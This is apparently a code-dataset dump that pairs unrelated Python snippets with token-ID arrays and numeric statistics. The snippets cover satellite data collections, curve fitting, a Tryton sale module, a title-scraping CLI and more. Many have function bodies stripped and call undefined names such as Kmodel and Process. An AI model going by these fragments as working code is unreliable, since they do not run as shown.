processing_level=_ProcessingLevel.L2,
bands=Bands.LANDSAT_TM_L2,
metabands=MetaBands.LANDSAT_TM_L2,
)
LANDSAT_ETM_L1 = DataCollectionDefinition(
api_id='landsat-etm-l1',
catalog_id='landsat-etm-l1',
wfs_id='DSS17',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_ETM,
sensor_type=_SensorType.ETM,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_ETM_L1,
metabands=MetaBands.LANDSAT_ETM_L1,
has_cloud_coverage=True,
)
LANDSAT_ETM_L2 = LANDSAT_ETM_L1.derive(
api_id='landsat-etm-l2',
catalog_id='landsat-etm-l2',
wfs_id='DSS18',
processing_level=_ProcessingLevel.L2,
bands=Bands.LANDSAT_ETM_L2,
metabands=MetaBands.LANDSAT_ETM_L2,
)
LANDSAT_OT_L1 = DataCollectionDefinition(
api_id='landsat-ot-l1',
catalog_id='landsat-ot-l1',
wfs_id='DSS12',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_OT,
sensor_type=_SensorType.OLI_TIRS,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_OT_L1,
metabands=MetaBands.LANDSAT_OT_L1,
has_cloud_coverage=True,
)
LANDSAT_OT_L2 = LANDSAT_OT_L1.derive(
api_id='landsat-ot-l2',
catalog_id='landsat-ot-l2',
wfs_id='DSS13',
processing_level=_ProcessingLevel.L2,
bands=Bands.LANDSAT_OT_L2,
metabands=MetaBands.LANDSAT_OT_L2,
)
SENTINEL5P = DataCollectionDefinition(
api_id='sentinel-5p-l2',
catalog_id='sentinel-5p-l2',
wfs_id='DSS7',
service_url=ServiceUrl.CREODIAS,
collection_type=_CollectionType.SENTINEL5P,
sensor_type=_SensorType.TROPOMI,
processing_level=_ProcessingLevel.L2,
bands=Bands.SENTINEL5P,
metabands=MetaBands.SENTINEL5P,
)
SENTINEL3_OLCI = DataCollectionDefinition(
api_id='sentinel-3-olci',
catalog_id='sentinel-3-olci',
wfs_id='DSS8',
service_url=ServiceUrl.CREODIAS,
collection_type=_CollectionType.SENTINEL3,
sensor_type=_SensorType.OLCI,
processing_level=_ProcessingLevel.L1B,
bands=Bands.SENTINEL3_OLCI,
metabands=MetaBands.SENTINEL3_OLCI,
)
SENTINEL3_SLSTR = DataCollectionDefinition(
api_id='sentinel-3-slstr',
catalog_id='sentinel-3-slstr',
wfs_id='DSS9',
service_url=ServiceUrl.CREODIAS,
collection_type=_CollectionType.SENTINEL3,
sensor_type=_SensorType.SLSTR,
processing_level=_ProcessingLevel.L1B,
bands=Bands.SENTINEL3_SLSTR,
metabands=MetaBands.SENTINEL3_SLSTR,
has_cloud_coverage=True,
)
# EOCloud collections (which are only available on a development eocloud service):
LANDSAT5 = DataCollectionDefinition(
wfs_id='L5.TILE',
service_url=ServiceUrl.EOCLOUD,
processing_level=_ProcessingLevel.GRD,
)
LANDSAT7 = DataCollectionDefinition(
wfs_id='L7.TILE',
service_url=ServiceUrl.EOCLOUD,
processing_level=_ProcessingLevel.GRD,
)
ENVISAT_MERIS = DataCollectionDefinition(
wfs_id='ENV.TILE',
service_url=ServiceUrl.EOCLOUD,
collection_type=_CollectionType.ENVISAT_MERIS,
)
# pylint: disable=too-many-locals
@classmethod
def define(cls, name, *, api_id=None, catalog_id=None, wfs_id=None, service_url=None, collection_type=None,
sensor_type=None, processing_level=None, swath_mode=None, polarization=None, resolution=None,
orbit_direction=None, timeliness=None, bands=None, metabands=None, collection_id=None, is_timeless=False,
has_cloud_coverage=False, dem_instance=None):
""" Define a new data collection
Note that all parameters, except `name` are optional. If a data collection definition won't be used for a
certain use case (e.g. Process API, WFS, etc.), parameters for that use case don't have to be defined
:param name: A name of a new data collection
:type name: str
:param api_id: An ID to be used for Sentinel Hub Process API
:type api_id: str or None
:param catalog_id: An ID to be used for Sentinel Hub Catalog API
:type catalog_id: str or None
:param wfs_id: An ID to be used for Sentinel Hub WFS service
:type wfs_id: str or None
:param service_url: A base URL of Sentinel Hub service deployment from where to download data. If it is not
specified, a `sh_base_url` from a config will be used by default
:type service_url: str or None
:param collection_type: A collection type
:type collection_type: str or None
:param sensor_type: A type of a satellite's sensor
:type sensor_type: str or None
:param processing_level: A level of processing applied on satellite data
:type processing_level: str or None
:param swath_mode: A swath mode of SAR sensors
:type swath_mode: str or None
:param polarization: A type of polarization
:type polarization: str or None
:param resolution: A type of (Sentinel-1) resolution
:type resolution: str or None
:param orbit_direction: A direction of satellite's orbit by which to filter satellite's data
:type orbit_direction: str or None
:param timeliness: A timeliness of data
:type timeliness: str or None
:param bands: Information about data collection bands
:type bands: tuple(Band) or None
:param metabands: Information about data collection metabands
:type metabands: tuple(Band) or None
:param collection_id: An ID of a BYOC or BATCH collection
:type collection_id: str or None
:param is_timeless: `True` if a data collection can be filtered by time dimension and `False` otherwise
:type is_timeless: bool
:param has_cloud_coverage: `True` if data collection can be filtered by cloud coverage percentage and `False`
otherwise
:type has_cloud_coverage: bool
:param dem_instance: one of the options listed in
`DEM documentation <https://docs.sentinel-hub.com/api/latest/data/dem/#deminstance>`__
:type dem_instance: str or None
:return: A new data collection
:rtype: DataCollection
"""
definition = DataCollectionDefinition(
api_id=api_id,
catalog_id=catalog_id,
wfs_id=wfs_id,
service_url=service_url,
collection_type=collection_type,
sensor_type=sensor_type,
processing_level=processing_level,
swath_mode=swath_mode,
polarization=polarization,
resolution=resolution,
orbit_direction=orbit_direction,
timeliness=timeliness,
bands=bands,
metabands=metabands,
collection_id=collection_id,
is_timeless=is_timeless,
has_cloud_coverage=has_cloud_coverage,
dem_instance=dem_instance,
_name=name
)
cls._try_add_data_collection(name, definition)
return cls(definition)
def define_from(self, name, **params):
""" Define a new data collection from an existing one
:param name: A name of a new data collection
:type name: str
:param params: Any parameter to override current data collection parameters
:return: A new data collection
:rtype: DataCollection
"""
definition = self.value
new_definition = definition.derive(**params, _name=name)
self._try_add_data_collection(name, new_definition)
return DataCollection(new_definition)
@classmethod
def _try_add_data_collection(cls, name, definition):
""" Tries adding a new data collection definition. If the exact enum has already been defined then it won't do
anything. However, if either a name or a definition has already been matched with another name or definition
then it will raise an error.
"""
is_name_defined = name in cls.__members__
is_enum_defined = is_name_defined and cls.__members__[name].value == definition
is_definition_defined = definition in cls._value2member_map_
if is_enum_defined:
return
if not is_name_defined and not is_definition_defined:
extend_enum(cls, name, definition)
return
if is_name_defined:
raise ValueError(f"Data collection name '{name}' is already taken by another data collection")
existing_collection = cls._value2member_map_[definition]
raise ValueError(f'Data collection definition is already taken by {existing_collection}. Two different '
f'DataCollection enums cannot have the same definition.')
@classmethod
def define_byoc(cls, collection_id, **params):
""" Defines a BYOC data collection
:param collection_id: An ID of a data collection
:type collection_id: str
:param params: Any parameter to override default BYOC data collection parameters
:return: A new data collection
:rtype: DataCollection
"""
params['name'] = params.get('name', f'BYOC_{collection_id}')
params['api_id'] = params.get('api_id', f'byoc-{collection_id}')
params['catalog_id'] = params.get('catalog_id', f'byoc-{collection_id}')
params['wfs_id'] = params.get('wfs_id', f'byoc-{collection_id}')
params['collection_type'] = params.get('collection_type', _CollectionType.BYOC)
params['collection_id'] = collection_id
return cls.define(**params)
@classmethod
def define_batch(cls, collection_id, **params):
""" Defines a BATCH data collection
:param collection_id: An ID of a data collection
:type collection_id: str
:param params: Any parameter to override default BATCH data collection parameters
:return: A new data collection
:rtype: DataCollection
"""
params['name'] = params.get('name', f'BATCH_{collection_id}')
params['api_id'] = params.get('api_id', f'batch-{collection_id}')
params['catalog_id'] = params.get('catalog_id', f'batch-{collection_id}')
params['wfs_id'] = params.get('wfs_id', f'batch-{collection_id}')
params['collection_type'] = params.get('collection_type', _CollectionType.BATCH)
params['collection_id'] = collection_id
return cls.define(**params)
@property
def api_id(self):
""" Provides a Sentinel Hub Process API identifier or raises an error if it is not defined
:return: An identifier
:rtype: str
:raises: ValueError
"""
if self.value.api_id is None:
raise ValueError(f'Data collection {self.name} is missing a Sentinel Hub Process API identifier')
return self.value.api_id
@property
def catalog_id(self):
""" Provides a Sentinel Hub Catalog API identifier or raises an error if it is not defined
:return: An identifier
:rtype: str
:raises: ValueError
"""
if self.value.catalog_id is not None:
return self.value.catalog_id
if self.value.api_id is not None:
# A fallback because Process API and Catalog API IDs should now be unified
return self.value.api_id
raise ValueError(f'Data collection {self.name} is missing a Sentinel Hub Catalog API identifier')
@property
def wfs_id(self):
""" Provides a Sentinel Hub WFS identifier or raises an error if it is not defined
:return: An identifier
:rtype: str
:raises: ValueError
"""
if self.value.wfs_id is None:
raise ValueError(f'Data collection {self.name} is missing a Sentinel Hub WFS identifier')
return self.value.wfs_id
@property
def bands(self):
""" Provides band information available for the data collection
:return: A tuple of band info
:rtype: tuple(str)
:raises: ValueError
"""
if self.value.bands is None:
raise ValueError(f'Data collection {self.name} does not define bands')
return self.value.bands
@property
def metabands(self):
""" Provides metaband information available for the data collection
:return: A tuple of metaband info
:rtype: tuple(str)
:raises: ValueError
"""
if self.value.metabands is None:
raise ValueError(f'Data collection {self.name} does not define metabands')
return self.value.metabands
def __getattr__(self, item, *args, **kwargs):
""" The following insures that any attribute from DataCollectionDefinition, which is already not a
property or an attribute of DataCollection, becomes an attribute of DataCollection
"""
if not item.startswith('_') and hasattr(self, 'value') and isinstance(self.value, DataCollectionDefinition):
definition_dict = _shallow_asdict(self.value)
if item in definition_dict:
return definition_dict[item]
return super().__getattribute__(item, *args, **kwargs)
@property
def is_sentinel1(self):
""" Checks if data collection is a Sentinel-1 collection type
Example: ``DataCollection.SENTINEL1_IW.is_sentinel1``
:return: `True` if collection is Sentinel-1 collection type and `False` otherwise
:rtype: bool
"""
return self.collection_type == _CollectionType.SENTINEL1
@property
def is_byoc(self):
""" Checks if data collection is a BYOC collection type
:return: `True` if collection is a BYOC collection type and `False` otherwise
:rtype: bool
"""
return self.collection_type == _CollectionType.BYOC
@property
def is_batch(self):
""" Checks if data collection is a batch collection type
:return: `True` if collection is a batch collection type and `False` otherwise
:rtype: bool
"""
return self.collection_type == _CollectionType.BATCH
def contains_orbit_direction(self, orbit_direction):
""" Checks if a data collection contains given orbit direction
:param orbit_direction: An orbit direction
:type orbit_direction: string
:return: `True` if data collection contains the orbit direction
:return: bool
"""
defined_direction = self.orbit_direction
if defined_direction is None or defined_direction.upper() == OrbitDirection.BOTH:
return True
return orbit_direction.upper() == defined_direction.upper()
@classmethod
def get_available_collections(cls, config=None):
""" Returns which data collections are available for configured Sentinel Hub OGC URL
:param config: A custom instance of config class to override parameters from the saved configuration.
:type config: SHConfig or None
:return: List of available data collections
:rtype: list(DataCollection)
"""
config = config or SHConfig()
is_eocloud = config.has_eocloud_url()
return [data_collection for data_collection in cls
if (data_collection.service_url == ServiceUrl.EOCLOUD) == is_eocloud]
DataSource = DataCollection
def handle_deprecated_data_source(data_collection, data_source, default=None):
""" Joins parameters used to specify a data collection. In case data_source is given it raises a warning. In case
both are given it raises an error. In case neither are given but there is a default collection it raises another
warning.
Note that this function is only temporary and will be removed in future package versions
"""
if data_source is not None:
warnings.warn('Parameter data_source is deprecated, use data_collection instead',
category=SHDeprecationWarning)
if data_collection is not None and data_source is not None:
raise ValueError('Only one of the parameters data_collection and data_source should be given')
if data_collection is None and data_source is None and default is not None:
warnings.warn('In the future please specify data_collection parameter, for now taking '
'DataCollection.SENTINEL2_L1C', category=SHDeprecationWarning)
return default
return data_collection or data_source
| [
37811,
198,
26796,
16215,
1366,
17268,
198,
37811,
198,
11748,
14601,
198,
6738,
33829,
1330,
2039,
388,
11,
2039,
388,
48526,
198,
6738,
19720,
1330,
309,
29291,
11,
32233,
198,
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
11,
2214,
... | 2.376942 | 11,588 |
#!/usr/bin/env python
# coding: utf-8
import web
from config import settings
from datetime import datetime
render = settings.render
db = settings.db
tb = 'todo'
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
3992,
198,
6738,
4566,
1330,
6460,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
198,
13287,
796,
6460,
13,
13287,
198,
9945,
796,
6460,
1... | 3.055556 | 54 |
from smoke.utils.registry import Registry
BACKBONES = Registry()
SMOKE_HEADS = Registry()
SMOKE_PREDICTOR = Registry()
| [
6738,
7523,
13,
26791,
13,
2301,
4592,
1330,
33432,
198,
198,
31098,
33,
39677,
796,
33432,
3419,
198,
50,
11770,
7336,
62,
37682,
50,
796,
33432,
3419,
198,
50,
11770,
7336,
62,
4805,
1961,
18379,
1581,
796,
33432,
3419,
198
] | 3 | 40 |
# %% [markdown]
"""
Fitting a custom kernel model with a parameter-free distribution
=================================================================
How the use of SNLLS to fit a kernel model and a parameter-free
distribution to a dipolar signal.
"""
import numpy as np
import matplotlib.pyplot as plt
import deerlab as dl
# %% [markdown]
# Generating a dataset
#-----------------------------------------------------------------------------
# For this example we will simulate a simple 4pDEER signal
t = np.linspace(-0.5,5,300) # µs
r = np.linspace(2,6,200) # nm
# Generate ground truth and input signal
P = dl.dd_gauss2(r,[3.5, 0.25, 0.4, 4.5, 0.4, 0.6])
lam = 0.36
c0 = 250 # µM
B = dl.bg_hom3d(t,c0,lam)
K = dl.dipolarkernel(t,r,mod=lam,bg=B)
V = K@P + dl.whitegaussnoise(t,0.01)
# %% [markdown]
# Fitting via SNLLS
#------------------
# Now in order to fit a non-linear dipolar kernel model ``Kmodel`` and a
# linear parameter-free distance distribution ``Pfit`` simultaneously, we
# can use the separable non-linear least squares ``SNLLS`` method.
#
# First we define the function that contains the model for the dipolar kernel we want to fit. It
# is a non-linear functon that accepts the parameter array ``p`` and returns the
# fitted dipolar kernel ``K``. The linear parameters, in this case ``P``, are
# computed by solving a Tikhonov-regularized linear LSQ problem automatically in the ``snlls`` function.
# %% [markdown]
# Next, there are two different parameter sets being fitted at the same time:
# linear and non-linear parameters. Therefore, the lower/upper bounds for
# the two sets need (or can) be specified.
#--------------------------
# Non-linear parameters:
#--------------------------
# lam c0
#--------------------------
par0 = [0.5, 50 ] # Start values
lb = [ 0, 0.05] # lower bounds
ub = [ 1, 1000] # upper bounds
#--------------------------
# Linear parameters:
#--------------------------
# Pfit
#--------------------------
lbl = np.zeros_like(r) # Non-negativity constraint of P
ubl = [] # Unconstrained upper boundary
# Run SNLLS optimization
fit = dl.snlls(V,Kmodel,par0,lb,ub,lbl,ubl)
parfit = fit.nonlin
Pfit = fit.lin
# Get non-linear parameters uncertainty
param95 = fit.nonlinUncert.ci(95) # 95#-confidence interval
# Get linear parameters (distribution) uncertainty
Pci50 = fit.linUncert.ci(50) # 50#-confidence interval
Pci95 = fit.linUncert.ci(95) # 95#-confidence interval
# Print result
print(f'lambda = {parfit[0]:.2f}({param95[0,0]:.2f}-{param95[0,1]:.2f})')
print(f'c0 = {parfit[1]:.2f}({param95[1,0]:.2f}-{param95[1,1]:.2f})µM')
# Get fitted model
Kfit = Kmodel(parfit)
Vfit = Kfit@Pfit
# %% [markdown]
# Plots
#------
plt.subplot(211)
plt.plot(t,V,'k.',t,Vfit,'b')
plt.grid(alpha=0.3)
plt.xlabel('t (µs)')
plt.ylabel('V')
plt.legend(['data','fit'])
plt.subplot(212)
plt.plot(r,P,'k',r,Pfit,'b')
plt.fill_between(r,Pci50[:,0],Pci50[:,1],color='b',alpha=0.4,linestyle='None')
plt.fill_between(r,Pci95[:,0],Pci95[:,1],color='b',alpha=0.2,linestyle='None')
plt.grid(alpha=0.3)
plt.xlabel('r (nm)')
plt.ylabel('P (nm⁻¹)')
plt.legend(['truth','fit','50%-CI','95%-CI'])
# %%
| [
2,
43313,
685,
4102,
2902,
60,
198,
37811,
198,
37,
2535,
257,
2183,
9720,
2746,
351,
257,
11507,
12,
5787,
6082,
198,
23926,
28,
198,
198,
2437,
262,
779,
286,
11346,
3069,
50,
284,
4197,
257,
9720,
2746,
290,
257,
11507,
12,
5787,... | 2.706838 | 1,170 |
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import random
import csv
from functions import sign_in, wait_for_element, URL
from selenium.webdriver.chrome.options import Options
from webdriver_manager.chrome import ChromeDriverManager
# Adatkezelési nyilatkozat használata
# Regisztráció
#Bejelentkezés
#Kijelentkezés
#Adatok listázása
#Új adatbevitel
#Több oldalas lista bejárása
# Ismételt és sorozatos adatbevitel adatforrásból
# Adatok lementése felületről - Global feed bejegyzések címei
#Meglévő adat módosítása
#Adat törlése
| [
11748,
640,
628,
198,
6738,
384,
11925,
1505,
1330,
3992,
26230,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11321,
13,
1525,
1330,
2750,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11284,
13,
17077,
1330,
5313,
32103,
213... | 2.435331 | 317 |
#! -*- coding: utf8 -*-
# This file is part of the sale_pos module for Tryton.
# The COPYRIGHT file at the top level of this repository contains the full
# copyright notices and license terms.
from decimal import Decimal
from trytond.model import ModelView, fields, ModelSQL
from trytond.pool import PoolMeta, Pool
from trytond.pyson import Bool, Eval, Not
from trytond.transaction import Transaction
from trytond.wizard import Wizard, StateView, StateTransition, Button, StateAction
from trytond import backend
from trytond.tools import grouped_slice
__all__ = ['Sale', 'SaleWarehouse', 'ProductLine', 'WarehouseStock',
'WizardWarehouseStock']
__metaclass__ = PoolMeta
_ZERO = Decimal('0.0')
class Sale():
'Sale'
__name__ = 'sale.sale'
@classmethod
@classmethod
@ModelView.button_action('sale_stock_product_mini.warehouse_stock')
class SaleWarehouse(ModelView, ModelSQL):
'Producto por Bodega'
__name__ = 'sale.warehouse'
sale = fields.Many2One('sale.sale', 'Sale', readonly = True)
product = fields.Char('Product', readonly = True)
warehouse = fields.Char('Warehouse', readonly = True)
quantity = fields.Char('Quantity', readonly = True)
class ProductLine(ModelView, ModelSQL):
'Product Line'
__name__ = 'product.product.line'
sequence = fields.Integer('Sequence')
product = fields.Many2One('product.product', 'Product')
add = fields.Boolean('Add')
quantity = fields.Numeric('Quantity')
review = fields.Boolean('Verificar Stock')
list_price = fields.Numeric('Precio Venta')
total_stock = fields.Integer('Total Stock')
class WarehouseStock(ModelView):
'Warehouse Stock'
__name__ = 'sale_stock_product_mini.warehouse'
product = fields.Char('Product')
lines = fields.One2Many('product.product.line', None, 'Lines')
warehouse_sale =fields.One2Many('sale.warehouse', 'sale', 'Product by Warehouse', readonly=True)
@fields.depends('product', 'lines')
@fields.depends('lines', 'warehouse_sale', 'product')
class WizardWarehouseStock(Wizard):
'Wizard Warehouse Stock'
__name__ = 'sale_stock_product_mini.warehouse_stock'
start = StateView('sale_stock_product_mini.warehouse',
'sale_stock_product_mini.warehouse_stock_view_form', [
Button('Close', 'end', 'tryton-cancel'),
Button('Add', 'add_', 'tryton-ok'),
])
add_ = StateTransition()
| [
198,
2,
0,
532,
9,
12,
19617,
25,
3384,
69,
23,
532,
9,
12,
198,
2,
770,
2393,
318,
636,
286,
262,
5466,
62,
1930,
8265,
329,
9993,
1122,
13,
198,
2,
383,
27975,
38162,
9947,
2393,
379,
262,
1353,
1241,
286,
428,
16099,
4909,
... | 2.871429 | 840 |
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 13 14:39:56 2018
@author: sudar
"""
from bs4 import Tag, BeautifulSoup
import requests
import csv
import numpy as np
import pandas as pd
from url_feeder import *
import re
import traceback
# ===========================Retrieve Data=================================
#####Uncomment to test######
# ===========================Retrieval Source=============================
if __name__== "__main__":
section = str(input("please input your section: "))
if section == 'company-officers':
company_management = url_feeder(section)
urls = company_management.feeder()
get_company_management(urls)
if section == 'financial-highlights':
financial = url_feeder(section)
urls = financial.feeder()
get_financial_highlights(urls)
if section == 'analyst':
analyst = url_feeder(section)
urls = analyst.feeder()
get_analyst(urls)
if section == 'overview':
overview = url_feeder(section)
urls = overview.feeder()
get_overview(urls)
if section == 'industry':
industry = url_feeder(section)
urls = industry.feeder()
get_industry(urls)
if section == 'segment':
segment = url_feeder(section)
urls = segment.feeder()
get_segment(urls)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
7031,
2556,
1511,
1478,
25,
2670,
25,
3980,
2864,
198,
198,
31,
9800,
25,
424,
27455,
198,
37811,
198,
198,
6738,
275,
82,
19,
1330,
17467,
11,... | 2.482079 | 558 |
import json
from nandboxbots.outmessages.OutMessage import OutMessage
| [
11748,
33918,
198,
198,
6738,
299,
392,
3524,
42478,
13,
448,
37348,
1095,
13,
7975,
12837,
1330,
3806,
12837,
628
] | 3.6 | 20 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
### Modules Importing ###
import os
import requests
from bs4 import BeautifulSoup
import toml
import argparse
### Modules Importing ###
class Main:
'''
Main Operations
Loading configuration files and languages, show the version and the logo, etc.
The functions on this class will be ran as soon as the program started.
'''
def GetParser(self):
'''
This function is used to get the options the users give.
'''
parser = argparse.ArgumentParser(
description='HELP', epilog='Have a nice day!')
parser.add_argument('-v', '--version', help='Show the version.', action='store_true')
parser.add_argument('-f', '--format', help='The format of output')
parser.add_argument('-o', '--output', help='The filename of output')
parser.add_argument(
'-u', '--url', help='The url from which you want to get the Title')
parser.add_argument(
'-i', '--input-file', help='The original url list. It may be a *.txt file.')
parser.add_argument(
'-b', '--batch-mode', help=
'Get titles from multi URLs, a list file(*.txt) and an output-file are required.', action="store_true")
return parser
def LoadTheConfig(self, filename):
'''
Configuration files will be loaded by this function.
This parameter "filename" is required to be a name of a toml file (*.toml),
In the source code library, you can find it in the directory 'config/'
For the installed, usually, it will be moved to the '/usr/share/titlegetter/'
And the file is "config.toml"
When finished loading, the result including the content of the configuration file would be returned.
And the other functions would use the result.
'''
config = toml.load(filename)
return config
def ShowLogo(self, config):
'''
The intention of this function is simple.
Showing a LOGO composed of texts on a terminal is its final mission. LOL
However, the LOGO was written to the configuration file by a foolish dog,
So the parameter "config" is used to receive the result of the function "LoadTheConfig()".
'''
print(config['Sign']['LOGO'])
'''
Well, finished.
But in order to read the LOGO correctly, the parameter "config" is required.
such as:
config = LoadTheConfig("config.toml")
ShowLogo(config=config)
Like this.
'''
def LoadOutputs(self, filename):
'''
The intention of this function is the same one as the function LoadTheConfig().
This parameter "filename" is required to be a name of a toml file (*.toml),
So...
In the source code library, you can find it in the directory 'config/'.
For the installed, usually, it will be moved to the '/usr/share/titlegetter/'.
And the file is "lang.toml".
Generally, we needn't to edit this file.
'''
lang = toml.load(filename)
return lang
'''
Here is the running aera for the classes, everything will be started from here.
'''
# Step Zero, initialize everything.
Starting = Main()
Do = Process()
if os.path.exists(str(os.getenv('XDG_CONFIG_HOME')) + '/titlegetter/config.toml') == True:
config = Starting.LoadTheConfig(
os.getenv('XDG_CONFIG_HOME') + '/titlegetter/config.toml')
elif os.path.exists(os.getenv('HOME') + '/.config/titlegetter/config.toml') == True:
config = Starting.LoadTheConfig(
os.getenv('HOME') + '/.config/titlegetter/config.toml')
elif os.path.exists('/etc/titlegetter/config.toml') == True:
config = Starting.LoadTheConfig('/etc/titlegetter/config.toml')
elif os.path.exists('config/config.toml') == True:
# Now it's time to load the config file. :)
config = Starting.LoadTheConfig(filename="config/config.toml")
Starting.ShowLogo(config=config)
parser = Starting.GetParser()
args = parser.parse_args()
headers = config['headers'] # import the headers
session = requests.session() # start a session
# Step One, Check if the BatchMode opening.
# Now it's time to check the WorkMode.
# if the LOGO is printed correctly, the configuration file has been loaded successfully.
if args.version:
Starting.ShowVersion('config/version')
os._exit(0)
if not args.batch_mode:
# If it's zero, then we will work on single-url mode.
# Now we just need to get the url.
URL = args.url
# then get the title
if URL == None:
parser.error('URL is required!')
parser.print_help()
Page = Do.GetPage(headers=headers, URL=URL, session=session, config=config)
Title = Do.GetTitle(page=Page)
# Then got the format.
if args.format == 'txt':
Do.PrintAsPureText(URL=URL, title=Title)
elif args.format == 'md':
Do.PrintAsMarkDown(URL=URL, title=Title)
elif args.format == 'html':
Do.PrintAsHTML(URL=URL, title=Title)
elif args.format == 'bbscode':
Do.PrintAsBBScode(URL=URL, title=Title)
elif args.format == None:
parser.error('Format is required!\n')
parser.print_help()
else:
parser.error("'" + args.format + "'" +
' is not a legal format that TitleGetter supports.\n')
parser.print_help()
elif args.batch_mode:
# If the WorkMode is one, then it will be different.
# at first we should read a text(*.txt) file which contains some URLs and the output-file.
InputFileName = args.input_file
# Then we need to get the name of output-file
OutputFileName = args.output
# And the format
Format = args.format
# If None, print the warn.
if InputFileName == None:
parser.error('Filename is required!')
parser.print_help()
os._exit(0)
if OutputFileName == None:
parser.error('Filename is required!')
parser.print_help()
os._exit(0)
if Format == None:
parser.error('Format is required!')
parser.print_help()
os._exit(0)
# If everything is ok.
with open(OutputFileName, 'w', encoding='utf-8') as f:
URLList = open(InputFileName)
for URL in URLList:
PureURL = URL.strip()
if PureURL == '':
parser.error('URL can not be empty!')
f.close()
os.remove(OutputFileName)
os._exit(0)
print('[Loaded] ' + PureURL)
Page = Do.GetPage(headers=headers, URL=PureURL, session=session)
Title = Do.GetTitle(page=Page)
if Format == 'txt':
f.write('Title: ' + Title + '\n' + 'Link: ' + PureURL + '\n\n')
Do.PrintAsPureText(title=Title, URL=PureURL)
elif Format == 'md':
f.write('[' + Title + ']' + '(' + PureURL + ')' + '\n\n')
Do.PrintAsMarkDown(title=Title, URL=PureURL)
elif Format == 'html':
f.write("<ul><a href=" + "\"" + PureURL +
"\"" + ">" + Title + "</a></ul>" + "\n")
Do.PrintAsHTML(title=Title, URL=PureURL)
elif Format == 'bbscode':
f.write("[url=" + PureURL + "]" + Title + "[/url]")
Do.PrintAsBBScode(title=Title, URL=PureURL)
# Tell the file to the user
print('\n\n\n\n File saved as:' + os.getcwd() + '/' + OutputFileName)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
198,
198,
21017,
3401,
5028,
17267,
278,
44386,
198,
11748,
28686,
198,
11748,
7007,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
1... | 2.433398 | 3,078 |
#! -*- coding: utf-8 -*-
#---------------------------------
# モジュールのインポート
#---------------------------------
import os
import argparse
from data_loader import common
_data_type = os.environ['DATA_TYPE']
if (_data_type == 'CIFAR-10'):
from data_loader import cifar10
elif (_data_type == 'Titanic'):
from data_loader import titanic
elif (_data_type == 'SARCOS'):
from data_loader import sarcos
elif (_data_type == 'COCO2014'):
from data_loader import coco_loader
elif (_data_type == 'MoviePoster'):
from data_loader import movie_poster
elif (_data_type == 'MNIST'):
from data_loader import mnist
else:
print('[ERROR] Unknown DATA_TYPE({})'.format(_data_type))
quit()
#---------------------------------
# 定数定義
#---------------------------------
#---------------------------------
# 関数
#---------------------------------
#---------------------------------
# メイン処理
#---------------------------------
if __name__ == '__main__':
main()
| [
2,
0,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
3880,
12,
198,
2,
14524,
95,
21091,
24440,
43353,
5641,
11482,
6527,
1209,
251,
12045,
230,
198,
2,
3880,
12,
198,
11748,
28686,
198,
11748,
1822,
29572,
19... | 3.025641 | 312 |
import numpy as np
| [
11748,
299,
32152,
355,
45941,
201
] | 3.166667 | 6 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Osman Baskaya"
import os
inst = "hdp-wsi/wsi_input/example/num_test_instances.all.txt"
wsi_input_folder = "hdp-wsi/wsi_input/example/all/"
#key_folder = "/scratch/1/obaskaya/mapping-impact/data/twitter/keys"
key_folder = "../data/twitter/keys"
existed = set([f[:-4] + ".n" for f in os.listdir(key_folder) if f.endswith('.key')])
print "Existed number of pseudoword is %d" % len(existed)
lines = open(inst).readlines()
f = open(inst, 'w')
total = 0
for line in lines:
ll, num = line.split()
if ll in existed:
f.write(line)
total += int(num)
else:
if os.path.exists(wsi_input_folder + ll + '.lemma'):
os.remove(wsi_input_folder + ll + '.lemma')
print "Total instances %d" % total
f.close()
| [
2,
0,
1220,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
834,
9800,
834,
796,
366,
16748,
805,
347,
2093,
11729,
1,
198,
198,
11748,
28686,
198,
198,
8625,
796,
366,
71,
26... | 2.267606 | 355 |
# Generated by Django 2.1.7 on 2019-04-12 06:15
from django.db import migrations
| [
2,
2980,
515,
416,
37770,
362,
13,
16,
13,
22,
319,
13130,
12,
3023,
12,
1065,
9130,
25,
1314,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
628
] | 2.766667 | 30 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class AppAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Type of action of the operation.
"""
#: Web app was restarted.
RESTARTED = "Restarted"
#: Web app was stopped.
STOPPED = "Stopped"
#: There was an operation to change app setting on the web app.
CHANGED_APP_SETTINGS = "ChangedAppSettings"
#: The job has started.
STARTED = "Started"
#: The job has completed.
COMPLETED = "Completed"
#: The job has failed to complete.
FAILED = "Failed"
class AppServicePlanAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Type of action on the app service plan.
"""
#: App Service plan is being updated.
UPDATED = "Updated"
class AsyncStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
